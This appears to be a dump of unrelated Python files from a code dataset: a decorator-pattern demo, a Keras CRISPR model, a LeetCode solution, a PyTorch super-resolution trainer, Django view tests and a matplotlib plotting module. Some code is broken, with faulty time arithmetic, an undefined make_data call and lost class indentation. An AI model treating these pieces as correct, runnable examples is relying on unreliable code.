        elif tpi_time >= 60 and tpi_time < 3600: # minutes
            mins = int(tpi_time / 60)
            secs = round(((tpi_time / 60) - mins) * 60, 1)
            print 'TPI computation time: ', mins, ' min, ', secs, ' sec'
        elif tpi_time >= 3600 and tpi_time < 86400: # hours
            hrs = int(tpi_time / 3600)
            mins = int(((tpi_time / 3600) - hrs) * 60)
            secs = round(((tpi_time / 60) - mins) * 60, 1)
            print 'TPI computation time: ', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
        elif tpi_time >= 86400: # days
            days = int(tpi_time / 86400)
            hrs = int(((tpi_time / 86400) - days) * 24)
            mins = int(((tpi_time / 3600) - hrs) * 60)
            secs = round(((tpi_time / 60) - mins) * 60, 1)
            print 'TPI computation time: ', days, ' days,', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
| 22,382 | 7,926 |
from abc import ABC, abstractmethod
class Component(ABC):
    """Abstract base of the decorator pattern.

    Declares the single operation that every concrete component and every
    decorator must implement, so clients can treat them uniformly.
    """

    @abstractmethod
    def operation(self) -> str:
        """Perform this component's operation and return its textual result."""
        ...
class ConcreteComponent(Component):
    """Plain component supplying the default behaviour that decorators wrap."""

    def operation(self) -> str:
        return "基本组件的基础实现"
class Decorator(Component):
    """Base decorator.

    Conforms to the Component interface while holding a reference to the
    wrapped component that concrete decorators forward work to.
    """

    _comment: Component = None  # wrapped component, assigned in __init__

    def __init__(self, comment: Component):
        self._comment = comment

    @property
    def comment(self) -> Component:
        """The wrapped component."""
        return self._comment

    @abstractmethod
    def operation(self) -> str:
        ...
class ConcreteDecoratorA(Decorator):
    """Decorator that prefixes the wrapped component's result with its tag."""

    def operation(self) -> str:
        inner = self.comment.operation()
        return f"A装饰器 {inner}"
class ConcreteDecoratorB(Decorator):
    """Decorator that prefixes the wrapped component's result with its tag."""

    def operation(self) -> str:
        inner = self.comment.operation()
        return f"B装饰器 {inner}"
def client_code(comment: Component) -> None:
    """Drive any Component uniformly, printing the result of its operation."""
    print("执行结果", end="\n")
    print(comment.operation())
if __name__ == '__main__':
    # Demo: plain component, then wrapped once (A), then wrapped twice (B over A).
    simple = ConcreteComponent()
    client_code(simple)
    ca = ConcreteDecoratorA(simple)
    client_code(ca)
    cb = ConcreteDecoratorB(ca)
    client_code(cb)
# """
# 装饰模式
# """
# from __future__ import annotations
# from abc import ABC, abstractmethod
#
#
# class IHouse(ABC):
# @abstractmethod
# def live(self):
# pass
#
#
# class House(IHouse):
# def live(self):
# print('房子基本功能-居住')
#
#
# class IMirrorHouse(IHouse):
# @abstractmethod
# def lookMirror(self):
# pass
#
#
# class MirrorHouse(IMirrorHouse):
# def __init__(self, se):
# self = se
#
# def lookMirror(self):
# print('有了镜子功能')
#
#
# if __name__ == '__main__':
# house = House()
# house.live()
# m = MirrorHouse(house)
# m.live()
# m.lookMirror()
| 1,812 | 682 |
# -*- coding:utf-8 -*-
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from keras.preprocessing import text, sequence
from keras.models import Model
from keras.layers import Input, Embedding
from keras.layers.core import Dropout
from keras.layers.convolutional import Conv1D, AveragePooling1D
from keras.layers import multiply
from keras.layers.core import Dense, Reshape, Lambda, Permute, Flatten
from keras.initializers import RandomUniform
from keras import regularizers
import keras.backend as K
import keras
import numpy as np
import pandas as pd
def attention(x, g, TIME_STEPS):
    """Additive-style attention over the time axis.

    Projects both feature maps `x` and `g` along the time axis, adds the
    projections, softmaxes over time, and rescales `x` elementwise by the
    resulting attention weights.

    Args:
        x: main-branch tensor; the attended output is derived from it.
           Assumes shape (batch, TIME_STEPS, channels) -- TODO confirm.
        g: gating-branch tensor with the same shape as x.
        TIME_STEPS: length of the time axis of x and g.

    Returns:
        Tensor with the same shape as x, weighted by the attention map.
    """
    input_dim = int(x.shape[2])
    # Move channels in front of time so the Dense layers act along time.
    x1 = K.permute_dimensions(x, (0, 2, 1))
    g1 = K.permute_dimensions(g, (0, 2, 1))
    x2 = Reshape((input_dim, TIME_STEPS))(x1)
    g2 = Reshape((input_dim, TIME_STEPS))(g1)
    x3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(x2)
    g3 = Dense(TIME_STEPS, kernel_initializer=RandomUniform(seed=2020))(g2)
    x4 = keras.layers.add([x3, g3])
    # Attention distribution over time steps (softmax, no bias).
    a = Dense(TIME_STEPS, activation="softmax", use_bias=False)(x4)
    a_probs = Permute((2, 1))(a)  # back to (batch, time, channels) layout
    output_attention_mul = multiply([x, a_probs])
    return output_attention_mul
def crispr_ont():
    """Build the CRISPR-ONT regression model.

    An integer-encoded 24-mer input is embedded, passed through a small
    Conv1D stack with an attention block, and regressed to one scalar.

    Returns:
        Uncompiled keras Model mapping a (batch, 24) integer input to a
        (batch, 1) linear output.
    """
    dropout_rate = 0.4
    input = Input(shape=(24,))
    # Vocabulary of 7 symbols, 44-dim embedding (presumably 4 bases plus
    # special tokens -- confirm the encoding used upstream).
    embedded = Embedding(7, 44, input_length=24)(input)
    conv1 = Conv1D(256, 5, activation="relu", name="conv1")(embedded)
    pool1 = AveragePooling1D(2)(conv1)
    drop1 = Dropout(dropout_rate)(pool1)
    # NOTE(review): conv2 branches from pool1 (pre-dropout) while conv3
    # branches from drop1 -- confirm this asymmetry is intentional.
    conv2 = Conv1D(256, 5, activation="relu", name="conv2")(pool1)
    conv3 = Conv1D(256, 5, activation="relu", name="conv3")(drop1)
    # Attention over the 6 remaining time steps, with conv2 as the gate.
    x = Lambda(lambda x: attention(x[0], x[1], 6))([conv3, conv2])
    my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=1))
    # Weighted skip connection: 20% pooled conv features, 80% attention output.
    weight_1 = Lambda(lambda x: x * 0.2)
    weight_2 = Lambda(lambda x: x * 0.8)
    flat1 = Flatten()(pool1)
    flat2 = Flatten()(x)
    flat = my_concat([weight_1(flat1), weight_2(flat2)])
    # L2-regularized dense head tapering 128 -> 64 -> 32 -> 1.
    dense1 = Dense(128,
        kernel_regularizer=regularizers.l2(1e-4),
        bias_regularizer=regularizers.l2(1e-4),
        activation="relu",
        name="dense1")(flat)
    drop3 = Dropout(dropout_rate)(dense1)
    dense2 = Dense(64,
        kernel_regularizer=regularizers.l2(1e-4),
        bias_regularizer=regularizers.l2(1e-4),
        activation="relu",
        name="dense2")(drop3)
    drop4 = Dropout(dropout_rate)(dense2)
    dense3 = Dense(32, activation="relu", name="dense3")(drop4)
    drop5 = Dropout(dropout_rate)(dense3)
    output = Dense(1, activation="linear", name="output")(drop5)
    model = Model(inputs=[input], outputs=[output])
    return model
if __name__ == '__main__':
    # Build the model and restore pre-trained weights from disk.
    model = crispr_ont()
    print("Loading weights for the models")
    model.load_weights("crispr_ont.h5")
    data_path = "data/test_ont.csv"
    data = pd.read_csv(data_path)
    # NOTE(review): make_data is neither defined nor imported in this file,
    # so this raises NameError as-is -- confirm where it should come from.
    x_test = make_data(data["sgRNA"])
    y_pred = model.predict([x_test])
| 3,009 | 1,177 |
"""769. Max Chunks To Make Sorted"""
class Solution(object):
    """LeetCode 769. Max Chunks To Make Sorted."""

    def maxChunksToSorted(self, arr):
        """Return the maximum number of chunks *arr* can be split into so
        that sorting each chunk individually sorts the whole array.

        *arr* is a permutation of 0..len(arr)-1. A chunk may end at index
        i exactly when the largest value seen so far equals i, because
        positions 0..i then hold exactly the values 0..i.

        :type arr: List[int]
        :rtype: int
        """
        # Guard: the original indexed arr[0] and raised IndexError on [].
        if not arr:
            return 0
        # Renamed from the misleading `min_index_for_chunk_end`: this is
        # the largest value encountered so far.
        highest_seen = arr[0]
        chunks = 0
        for i, value in enumerate(arr):
            highest_seen = max(highest_seen, value)
            if highest_seen == i:
                chunks += 1
        return chunks
| 439 | 151 |
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
import torch.nn.functional as F
import torchvision
import torchvision.models as models
from torchvision import transforms
from PIL import Image
from time import time
import matplotlib.pyplot as plt
import os
import numpy as np
import sys
import cv2
#=================================================
# HYPERPARAMETERS HERE...
# Shared augmentation applied once per image, before deriving both the
# network input and the target, so input and target stay aligned.
img_transforms = transforms.Compose([
    transforms.Resize((224,224)),
    transforms.RandomHorizontalFlip(p=0.5),
    transforms.RandomVerticalFlip(p=0.5),
    transforms.RandomRotation(45)
])
# Full-resolution target: tensor conversion + ImageNet normalization.
target_transform = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225] )
])
# Low-resolution network input (downscaled to 56x56), same normalization.
input_transform = transforms.Compose([
    transforms.Resize((56, 56)),#((224,224)),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225] )
])
# Prefer the GPU when one is available.
if torch.cuda.is_available():
    device = torch.device("cuda")
else:
    device = torch.device("cpu")
loss_func = torch.nn.SmoothL1Loss()  # robust L1/L2 hybrid regression loss
epochs = 150
batch_size=4
lr = 0.001
datapath = 'catdog/srgan_datatrain'
# NOTE: every file in datapath is treated as a training image.
train_data = os.listdir(datapath)
# CLASS AND FUNCTION HERE...
def read_batch(datapath, imgname):
    """Load one batch of images from *datapath*.

    Each image is augmented once (module-level img_transforms), then split
    into a full-resolution target and a downscaled network input.

    Args:
        datapath: directory holding the image files.
        imgname: iterable of file names to load.

    Returns:
        (inputs, targets): two stacked tensors on the module-level device.
    """
    low_res, full_res = [], []
    for name in imgname:
        augmented = img_transforms(Image.open(os.path.join(datapath, name)))
        full_res.append(target_transform(augmented))
        low_res.append(input_transform(augmented))
    batch_in = torch.stack(low_res, dim=0).to(device)
    batch_tgt = torch.stack(full_res, dim=0).to(device)
    return batch_in, batch_tgt
# here comes the training function!
def train(model, optimizer, loss_fn, train_data, datapath=None, batch_size = 5, epochs=20, device="cpu"):
    """Train *model* on the image files listed in *train_data*.

    Shuffles the data each epoch, optimizes with *loss_fn*, and saves the
    weights whenever the epoch's average training loss improves.

    Args:
        model: network to optimize (already moved to *device* by caller).
        optimizer: torch optimizer bound to model.parameters().
        loss_fn: loss taking (output, target) tensors.
        train_data: sequence of image file names under *datapath*.
        datapath: directory containing the training images.
        batch_size: number of images per optimization step.
        epochs: number of passes over the dataset.
        device: torch device for inputs and targets.
    """
    lowest_train_loss = 1e+6
    order = np.arange(len(train_data))
    train_data = np.array(train_data)
    print('=======================')
    print('Training data number: ', len(train_data))
    print('Start Training...')
    for epoch in range(epochs):
        training_loss = 0.0
        model.train()
        np.random.shuffle(order)
        start = time()
        # BUG FIX: the original kept a counter `ctr` that grew by `b` each
        # iteration and sliced `train_num[b:b+ctr]`, so later "batches"
        # spanned most of the dataset. Use a fixed batch_size window.
        for b in range(0, len(order), batch_size):
            batch_names = train_data[order[b:b + batch_size]]
            optimizer.zero_grad()
            inputs, targets = read_batch(datapath, batch_names)
            inputs = inputs.to(device)
            targets = targets.to(device)
            output = model(inputs)
            loss = loss_fn(output, targets)
            loss.backward()
            optimizer.step()
            # Weight by batch size so the epoch average is per-image.
            training_loss += loss.data.item() * inputs.size(0)
        training_loss /= len(order)
        print('Epoch: {}, time: {:.2f}s, Lowest train loss: {:.2f}, Training Loss: {:.2f}'.format(
            epoch, time() - start, lowest_train_loss, training_loss))
        if training_loss < lowest_train_loss:
            lowest_train_loss = training_loss
            # NOTE(review): `epochs > 10` looks like it was meant to be
            # `epoch > 10` (skip saving during warm-up); kept as-is to
            # preserve behavior -- confirm intent.
            if epochs > 10:
                torch.save(model.state_dict(), r'D:\pytorch_tutorial\catdog\srgan_trained.pth')
class OurFirstSRNet(nn.Module):
def __init__(self):
super(OurFirstSRNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(3, 64, kernel_size=8, stride=2, padding=3),
nn.ReLU(inplace=True),
nn.Conv2d(64, 192, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(192, 256, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True)
)
self.upsample = nn.Sequential(
nn.ConvTranspose2d(256,256,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(256, 256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(256,192,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(192,128,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(128, 128, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(128,64,kernel_size=2, stride=2, padding=0),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(64,3, kernel_size=4, stride=2, padding=1),
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.features(x)
x = self.upsample(x)
return x
# test image transform
# Build a single example input to sanity-check tensor shapes below.
img = Image.open(os.path.join(datapath, train_data[0]))
img = img_transforms(img)
img = input_transform(img).unsqueeze(0).to(device)
# test forward propagation
model = OurFirstSRNet()
model.to(device)
print('=======================')
print('Example input-output...')
print('input: ', img.size())
output = model(img)
print('output:', output.size())
# define Backprop Optimizer
optimizer = optim.Adam(model.parameters(), lr=lr)
# NOTE(review): weights are loaded unconditionally here, so a missing
# checkpoint aborts even a fresh 'training' run -- confirm this is wanted.
model.load_state_dict(torch.load( r'catdog/srgan_trained.pth') )
# training: `python <script> training`
if sys.argv[1] == 'training':
    print('...You pick mode training...')
    train(model, optimizer, loss_func, train_data, datapath=datapath,
        batch_size = batch_size, epochs=epochs, device=device)
# testing: `python <script> detecting` runs one inference on the example image
if sys.argv[1] == 'detecting':
    print('...You pick mode detecting...')
    model.load_state_dict(torch.load( r'catdog/srgan_trained.pth') )
    model.eval()
    with torch.no_grad():
        output = model(img).cpu().squeeze(0).numpy()
    print('output:', output.shape)
    # cv2.imwrite('output.png', output[...,::-1].astype(np.uint8))
| 6,023 | 2,211 |
from uuid import uuid4
from django.test import TestCase
from accounts.models import User
from articles.models import Article
from articles.testhelpers import create_user, create_mock_article, get_random_string
class EditArticleTest(TestCase):
    """Integration tests for the article edit view (/article/<id>/edit).

    Covers access control (anonymous, non-author, author, admin),
    missing-article handling, form-validation limits, and successful
    edits. The original ``__init__`` override only forwarded
    ``methodName`` and gave it a broken ``...`` default (which breaks
    no-argument construction); it added nothing over ``TestCase`` and
    has been removed in favor of the inherited constructor.
    """

    def setUp(self) -> None:
        """Sets up test data. Creates three users and a mock article"""
        create_user('TestUser', 'TestUser_P', False, False)
        author = create_user('AuthorTestUser', 'AuthorTestUser_P', True, False)
        create_user('AdminTestUser', 'AdminTestUser_P', False, True)
        create_mock_article(author)
        return super().setUp()

    def tearDown(self) -> None:
        """Removes every user and article created during a test."""
        User.objects.all().delete()
        Article.objects.all().delete()
        return super().tearDown()

    def test_edit_article_get_as_unauthenticated(self):
        """
        Given an article exists,
        When I try to edit the article as an unauthenticated user,
        Then I am redirected to the home page
        """
        article = Article.objects.all().first()
        response = self.client.get('/article/' + str(article.id) + '/edit')
        self.assertEqual(response.status_code, 302)

    def test_edit_article_get_as_authenticated_but_not_original_author(self):
        """
        Given an article exists,
        When I try to edit the article as not the original article author,
        Then I am redirected to the home page
        """
        article = Article.objects.all().first()
        self.client.login(username='testuser', password='TestUser_P')
        response = self.client.get('/article/' + str(article.id) + '/edit')
        self.assertEqual(response.status_code, 302)

    def test_edit_article_get_as_authenticated_as_original_author(self):
        """
        Given an article exists,
        When I try to edit the article as the original article author,
        Then I am redirected to the article edit page
        """
        article = Article.objects.all().first()
        self.client.login(username='authortestuser', password='AuthorTestUser_P')
        response = self.client.get('/article/' + str(article.id) + '/edit')
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        # A GET must not mutate the stored article.
        self.assertEqual(checkArticle.title, article.title)
        self.assertEqual(checkArticle.summary, article.summary)
        self.assertEqual(checkArticle.content, article.content)
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertEqual(checkArticle.updated_on, article.updated_on)
        # The edit form must be pre-populated with the current values.
        form = response.context['form']
        actual_title = str(form.fields['title'].initial)
        actual_summary = str(form.fields['summary'].initial)
        actual_content = str(form.fields['content'].initial)
        self.assertEqual(actual_title, article.title)
        self.assertEqual(actual_summary, article.summary)
        self.assertEqual(actual_content, article.content)

    def test_edit_article_get_as_authenticated_as_admin(self):
        """
        Given an article exists,
        When I try to edit the article as an admin,
        Then I am redirected to the article edit page
        """
        article = Article.objects.all().first()
        self.client.login(username='admintestuser', password='AdminTestUser_P')
        response = self.client.get('/article/' + str(article.id) + '/edit')
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        # A GET must not mutate the stored article.
        self.assertEqual(checkArticle.title, article.title)
        self.assertEqual(checkArticle.summary, article.summary)
        self.assertEqual(checkArticle.content, article.content)
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertEqual(checkArticle.updated_on, article.updated_on)
        # The edit form must be pre-populated with the current values.
        form = response.context['form']
        actual_title = str(form.fields['title'].initial)
        actual_summary = str(form.fields['summary'].initial)
        actual_content = str(form.fields['content'].initial)
        self.assertEqual(actual_title, article.title)
        self.assertEqual(actual_summary, article.summary)
        self.assertEqual(actual_content, article.content)

    def test_edit_article_get_with_missing_article(self):
        """
        Given article does not exist,
        When I try to edit the article an an author,
        Then I am redirected to the home page
        """
        self.client.login(username='authortestuser', password='AuthorTestUser_P')
        response = self.client.get('/article/' + str(uuid4()) + '/edit')
        self.assertEqual(response.status_code, 302)

    def test_edit_article_get_with_missing_article_as_admin(self):
        """
        Given article does not exist,
        When I try to edit the article an an admin,
        Then I am redirected to the home page
        """
        self.client.login(username='admintestuser', password='AdminTestUser_P')
        response = self.client.get('/article/' + str(uuid4()) + '/edit')
        self.assertEqual(response.status_code, 302)

    def test_edit_article_with_title_too_long(self):
        """
        Given an article exist,
        When I try to edit the article with a title that is too long,
        Then I am redirected to the article edit page and my changes do not save
        """
        article = Article.objects.all().first()
        title = get_random_string(201)  # title max length is 200
        data = {
            'title': title,
            'summary': 'New summary',
            'content': 'New content'
        }
        self.client.login(username='authortestuser', password='AuthorTestUser_P')
        response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        self.assertNotEqual(checkArticle.title, title)
        self.assertNotEqual(checkArticle.summary, 'New summary')
        self.assertNotEqual(checkArticle.content, 'New content')
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertEqual(checkArticle.updated_on, article.updated_on)

    def test_edit_article_with_summary_too_long(self):
        """
        Given an article exist,
        When I try to edit the article with a summary that is too long,
        Then I am redirected to the article edit page and my changes do not save
        """
        article = Article.objects.all().first()
        summary = get_random_string(256)  # summary max length is 255
        data = {
            'title': 'New title',
            'summary': summary,
            'content': 'New content'
        }
        self.client.login(username='authortestuser', password='AuthorTestUser_P')
        response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        self.assertNotEqual(checkArticle.title, 'New title')
        self.assertNotEqual(checkArticle.summary, summary)
        self.assertNotEqual(checkArticle.content, 'New content')
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertEqual(checkArticle.updated_on, article.updated_on)

    def test_edit_article(self):
        """
        Given an article exist,
        When I try to edit the article as the author,
        Then I am redirected to the article edit page and my changes save
        """
        article = Article.objects.all().first()
        data = {
            'title': 'New title',
            'summary': 'New summary',
            'content': 'New content'
        }
        self.client.login(username='authortestuser', password='AuthorTestUser_P')
        response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(checkArticle.title, 'New title')
        self.assertEqual(checkArticle.summary, 'New summary')
        self.assertEqual(checkArticle.content, 'New content')
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertNotEqual(checkArticle.updated_on, article.updated_on)

    def test_edit_article_as_admin(self):
        """
        Given an article exist,
        When I try to edit the article as an admin,
        Then I am redirected to the article edit page and my changes save
        """
        article = Article.objects.all().first()
        data = {
            'title': 'New title',
            'summary': 'New summary',
            'content': 'New content'
        }
        self.client.login(username='admintestuser', password='AdminTestUser_P')
        response = self.client.post('/article/' + str(article.id) + '/edit', data=data)
        checkArticle = Article.objects.get(id=article.id)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(checkArticle.title, 'New title')
        self.assertEqual(checkArticle.summary, 'New summary')
        self.assertEqual(checkArticle.content, 'New content')
        self.assertEqual(checkArticle.created_on, article.created_on)
        self.assertNotEqual(checkArticle.updated_on, article.updated_on)
from matplotlib import rc
rc('text', usetex=True) # this is if you want to use latex to print text. If you do you can create strings that go on labels or titles like this for example (with an r in front): r"$n=$ " + str(int(n))
from numpy import *
from pylab import *
import random
from matplotlib.font_manager import FontProperties
import matplotlib.pyplot as plt
import matplotlib.lines as lns
from scipy import stats
from matplotlib.patches import Polygon, Circle
import matplotlib.font_manager as fm
def latex_float(f):
    """Format *f* to two significant figures as LaTeX math source,
    rendering scientific notation as 'mantissa \\times 10^{exp}'."""
    text = "{0:.2g}".format(f)
    if "e" not in text:
        return text
    mantissa, _, exponent = text.partition("e")
    return r"{0} \times 10^{{{1}}}".format(mantissa, int(exponent))
class EffPt( object ):
    """One efficiency datapoint parsed from a pre-split table row.

    Numeric columns pulled from the row: bytes transferred (bxf), flop
    count (flops), arithmetic intensity (ai) and runtime seconds (rts).
    """
    def __init__( self, elp ):
        self.cols = ["varname","bxf","flops","ai","rts"]
        # Strip the 6-char leading tag and trailing delimiter from the
        # variant field (presumably 'name="..."' -- confirm row format).
        self.varname = elp[4][6:-1]
        self.bxf, self.flops, self.ai, self.rts = (
            float(elp[k]) for k in (6, 7, 8, 9))
        # Fields that identify the operation itself; used to match points
        # across two runs.
        self.opinfo = elp[0:3] + elp[5:6]
        self.comp = None  # matching point from a comparison run, if any
    def __str__( self ):
        parts = []
        for col in self.cols:
            parts.append("%s=%s" % (col, getattr(self, col)))
        return " ".join(parts)
class varinfo( object ):
    """Plot styling and legend bookkeeping for one code variant."""
    def __init__( self, name, color, mark='o', mark_comp='d' ):
        self.name = name
        self.color = color
        self.mark = mark            # marker for primary-run points
        self.mark_comp = mark_comp  # marker for comparison-run points
        # Proxy artists used only to build legend entries.
        self.art = plt.Line2D((0,0),(0,0), color=self.color, marker=self.mark, linestyle='')
        self.art_comp = plt.Line2D((0,0),(0,0), color=self.color, marker=self.mark_comp, linestyle='')
        self.num_use = 0
        self.num_use_comp = 0
    def clear_use( self ):
        """Reset both usage counters (called after each legend build)."""
        self.num_use = 0
        self.num_use_comp = 0
    def inc_use( self, is_comp ):
        """Record that a point of this variant was plotted."""
        if is_comp:
            self.num_use_comp += 1
        else:
            self.num_use += 1
    def get_mark( self, is_comp ):
        """Return the marker for a primary or comparison point."""
        if is_comp:
            return self.mark_comp
        return self.mark
    def get_leg( self, leg_art, leg_lab ):
        """Append legend artist/label pairs for any variant that was used,
        then reset the usage counters."""
        verb_name = "\\verb|" + self.name + "|"
        if self.num_use:
            leg_art.append(self.art)
            leg_lab.append(verb_name)
        if self.num_use_comp:
            leg_art.append(self.art_comp)
            leg_lab.append(verb_name[:-1] + " (Comp)|")
        self.clear_use()
# One varinfo per known variant; the *_simd variants share the color of
# their scalar counterpart so related variants read as one family.
vis = [
    varinfo( "conv", "cornflowerblue" ),
    varinfo( "conv_simd", "cornflowerblue" ),
    varinfo( "k1conv", "green" ),
    varinfo( "k1conv_simd", "green" ),
    varinfo( "tconv", "purple" ),
    varinfo( "cudnn_conv", "red" ),
]
# Lookup from variant name (EffPt.varname) to its plot styling.
vis_map = { vi.name:vi for vi in vis }
def inc_comp( epts ):
    """Yield every point in *epts*; any point carrying a comparison point
    is immediately followed by that comparison point."""
    for pt in epts:
        yield pt
        if pt.comp:
            yield pt.comp
def read_eff_file( epts, fn ):
    """Parse the '&'-separated table in file *fn*, appending one EffPt per
    row to *epts*; rows whose runtime parses as NaN are dropped.

    Raises AssertionError if a row does not have exactly 12 fields.
    """
    # Fix: use a context manager so the file handle is closed -- the
    # original iterated open(fn).readlines() and leaked the handle.
    with open( fn ) as f:
        for el in f:
            elps = [ elp.strip() for elp in el.split("&") ]
            assert len(elps) == 12
            ept = EffPt( elps )
            if not math.isnan( ept.rts ):
                epts.append( ept )
def adj_tick_lab( lab ):
    """Convert a log10 tick-label artist into a LaTeX label showing the
    corresponding linear value (via latex_float); '' stays ''."""
    text = lab.get_text()
    if not text:
        return ""
    if text.startswith("$"):
        text = text[1:-1]  # drop surrounding math delimiters
    sign = 1.0
    if text.startswith(u'\u2212'):  # matplotlib renders minus as U+2212
        text = text[1:]
        sign = -1.0
    return "$%s$" % latex_float(10**(sign * float(text)))
class EffPlot( object ):
    def __init__( self, args ):
        """Load efficiency data (plus optional comparison data), pair up
        matching points by opinfo, and render the plots.

        args fields used here: eff_fn, eff_comp_fn, do_zooms, out_fn
        (mutated when zooming), plus whatever do_plots reads.
        """
        self.args = args
        self.epts = []
        self.epts_comp = []
        read_eff_file( self.epts, self.args.eff_fn )
        if self.args.eff_comp_fn:
            read_eff_file( self.epts_comp, self.args.eff_comp_fn )
            # Comparison file must list the same operations in the same order.
            assert len(self.epts) == len(self.epts_comp)
            for ept,ept_comp in zip(self.epts,self.epts_comp):
                assert ept.opinfo == ept_comp.opinfo
                ept.comp = ept_comp
        self.do_plots()
        if self.args.do_zooms:
            # Re-plot twice, each pass keeping only points below 1/10th of
            # the current max flops, to zoom in on the smaller operations.
            for zl in [1,2]:
                self.args.out_fn += "-zoom"
                max_flops = max( ept.flops for ept in self.epts )
                self.epts = [ ept for ept in self.epts if ept.flops < (max_flops/10.0) ]
                self.do_plots()
    def skip_plot_check_flops_vs_time( self, ept ):
        """Return 1 if *ept* should be omitted from the flops-vs-time plot,
        else 0. Points without a comparison partner are always kept."""
        if not ept.comp: return 0 # no comp? if so, never skip.
        delta = abs( ept.rts - ept.comp.rts )
        # Relative runtime difference between the two runs (currently unused).
        rel_delta = delta * 2.0 / (ept.rts + ept.comp.rts)
        # if rel_delta < self.args.min_rel_delta_to_show: return 1 # we're really trying to show variant difference, so skip this check
        if ept.varname == ept.comp.varname: return 1 # FIXME: skip when comp is same variant. not right in general, but okay for now
        # FIXME: a few data points have the same variant, but sig. diff runtimes. there is certainly some noise in the runtimes, or the code might have shifted a bit between the two runs, or it's possible the tuning params were a little different between the two runs. for now, we'll skip such points, but we should investigate more.
        return 0
    def plot_flops_vs_time_pt( self, ax, ept, is_comp ):
        """Plot one point on the log-log flops-vs-runtime axes using the
        variant's styling; returns its (log10 flops, log10 rts) coords so
        the caller can draw connector lines."""
        vi = vis_map[ept.varname]
        vi.inc_use( is_comp )  # so the legend later includes this variant
        x,y = math.log(ept.flops,10), math.log(ept.rts,10)
        ax.plot(x, y, color=vi.color, markersize=4, alpha=.7, marker=vi.get_mark(is_comp), linestyle=' ' )
        return x,y
    def plot_fps_vs_ai_pt( self, ax, ept, is_comp ):
        """Plot one point on the FLOPS/s-vs-arithmetic-intensity axes;
        marker size grows with log10(flops) so bigger ops stand out.
        Returns the point's (ai, flops/rts) coords."""
        vi = vis_map[ept.varname]
        vi.inc_use( is_comp )  # so the legend later includes this variant
        x = ept.ai
        y = ept.flops/ept.rts
        ax.plot( x,y, color=vi.color, markersize=2*max(1,math.log(ept.flops,10)-6), alpha=.7, marker=vi.get_mark(is_comp), linestyle=' ' )
        return x,y
def do_plots( self ):
    """Render and save two figures: runtime-vs-FLOPS (log/log) and F/s-vs-AI.

    Uses module-level matplotlib rc state plus the vis/vis_map legend helpers;
    writes <out_fn>.<out_fmt> and <out_fn>-ai.<out_fmt>.
    """
    # flops vs runtime plot with 60GF/s line
    background_color =(0.85,0.85,0.85) #'#C0C0C0'
    grid_color = 'white' #FAFAF7'
    # Global style: light grey plot area with a white grid drawn below the data.
    rc('axes', facecolor = background_color)
    rc('axes', edgecolor = grid_color)
    rc('axes', linewidth = 1.2)
    rc('axes', grid = True )
    rc('axes', axisbelow = True)
    rc('grid',color = grid_color)
    rc('grid',linestyle='-' )
    rc('grid',linewidth=0.7 )
    #rc('xtick.major',size =0 )
    #rc('xtick.minor',size =0 )
    #rc('ytick.major',size =0 )
    #rc('ytick.minor',size =0 )
    # filter data based on skip check
    self.epts = [ ept for ept in self.epts if not self.skip_plot_check_flops_vs_time( ept ) ]
    fig = plt.figure()
    ax = fig.add_subplot(111)
    #formatting:
    ax.set_title("RUNTIME (seconds) vs \\#-of-FLOPS [log/log scale]",fontsize=12,fontweight='bold')
    ax.set_xlabel("\\#-of-FLOPS", fontsize=12) # ,fontproperties = font)
    ax.set_ylabel("RUNTIME (seconds)", fontsize=12) # ,fontproperties = font)
    # Axis bounds come from primary AND comparison points, in log10 space.
    x = [ math.log(ept.flops,10) for ept in inc_comp(self.epts) ]
    y = [ math.log(ept.rts,10) for ept in inc_comp(self.epts) ]
    self.set_bnds( ax, x, y )
    # print matplotlib.lines.Line2D.filled_markers
    # --> (u'o', u'v', u'^', u'<', u'>', u'8', u's', u'p', u'*', u'h', u'H', u'D', u'd')
    for ept in self.epts:
        x,y = self.plot_flops_vs_time_pt( ax, ept, 0 )
        if ept.comp:
            # Connect each point to its comparison point with a thin black line.
            xc,yc = self.plot_flops_vs_time_pt( ax, ept.comp, 1 )
            ax.plot( [x,xc], [y,yc], linewidth=0.5, color='black' )
    leg_art = []; leg_lab = []
    for vi in vis: vi.get_leg( leg_art, leg_lab )
    legend = ax.legend(leg_art,leg_lab,loc='lower right', shadow=True, fontsize='small',numpoints=1,ncol=1)
    legend.get_frame().set_facecolor('#eeddcc')
